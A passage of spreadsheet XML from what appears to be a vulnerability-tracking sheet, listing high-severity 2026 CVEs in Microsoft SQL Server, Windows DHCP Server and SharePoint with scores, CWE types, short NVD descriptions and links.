      <c r="S41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67368</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr"/>
      <c r="Q42" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67368</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67370</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr"/>
      <c r="Q43" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67373</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr"/>
      <c r="Q44" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67380</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr"/>
      <c r="Q45" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67381</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr"/>
      <c r="Q46" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67384</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr"/>
      <c r="Q47" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67385</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K48" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr"/>
      <c r="Q48" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67388</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K49" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr"/>
      <c r="Q49" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67631</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K50" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr"/>
      <c r="Q50" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67631</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67638</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr"/>
      <c r="Q51" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67638</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67639</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K52" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr"/>
      <c r="Q52" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67639</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67642</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr"/>
      <c r="Q53" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67642</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67643</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K54" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr"/>
      <c r="Q54" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67643</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68775</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K55" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr"/>
      <c r="Q55" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68775</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68786</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K56" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr"/>
      <c r="Q56" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68786</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69266</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K57" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr"/>
      <c r="Q57" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69266</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69268</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr"/>
      <c r="Q58" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
